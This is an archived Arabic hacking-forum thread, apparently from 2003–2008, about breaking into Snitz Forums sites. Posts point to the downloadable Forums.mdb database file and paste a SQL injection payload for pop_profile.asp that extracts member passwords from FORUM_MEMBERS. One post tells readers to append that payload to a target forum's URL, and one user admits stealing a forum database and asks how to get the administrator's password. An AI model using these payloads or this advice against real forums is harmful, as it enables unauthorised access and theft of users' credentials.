مشاهدة النسخة كاملة : هل يوجد ثغرات في منتديات Snitz Forums ؟
شباب فيه منتديات من نوع Snitz Forums لم يسبق لكم الحديث عنها او عن ثغراتها وهذا موقع الشركه التي تقدم هذا النوع من المنتديات http://forum.snitz.com/
اتمنى منكم تلقو نظره علي هذا النوع من المنتديات وتفيدونا اذا كان هنالك ثغرات فيها
ولكم تحياتي
مــiiiــــاكــس
11-10-2003, 07:30
طبعا اذا بغيت الثغره فهاذي هيا
Forums.mdb
روح الموقع
http://www.securityfocus.com/search
|4|
DEATH DRAGON
04-09-2007, 06:16
من هنا
www.arab10.fr.ma
wael@love
06-09-2007, 12:19
أخي هذة احدى الثغرات لهذا المنتدى منقولة:
Snitz Forums 2000 Version 3.1 SR4 (pop_profile.asp) Remote SQL Injection Vulnerability
=================================X=O=R=O=N======== =========================
Bulan: xoron
xoron.info - xoron.biz
=================================X=O=R=O=N======== =========================
POC: pop_profile.asp?mode=display&id=[SQL-INJ]
=================================X=O=R=O=N======== =========================
Username:
pop_profile.asp?mode=display&id=1
Pass:
pop_profile.asp?mode=display&id=-1+union+all+select+0,M_PASSWORD,2,3,4,5,6,7,8,9,10 ,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,2 7,28,29,30,31+from+FORUM_MEMBERS
اخوتي لقد استطعت أن اسرق داتابايس database لاحد منتديات snitz
كيف يمكنني اختراقه او ايجاد باسوورد المدير
وشكرا
اخوتي لقد استطعت أن اسرق داتابايس database لاحد منتديات snitz
كيف يمكنني اختراقه او ايجاد باسوورد المدير
وشكرا
خش على الuser
وروح للعضويه رقم 1
تـشـأأو
houssain xp
15-12-2007, 11:16
آرجوا من الخبراء التوضيح أكثر
آرجوا من الخبراء التوضيح أكثر
اخوان اذا ما زلت الثغرة شغاله
ضع هذا الكود بعد رابط المنتدى
pop_profile.asp?mode=display&id=-1+union+all+select+0,M_PASSWORD,2,3,4,5,6,7,8,9,10 ,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,2 7,28,29,30,31+from+FORUM_MEMBERS
على فكرة الموضوع قديم منذ 5 سنوات
آرجوا من الخبراء التوضيح أكثر
Powered by vBulletin® Version 3.6.8
Copyright ©2000 - 2008, Jelsoft Enterprises Ltd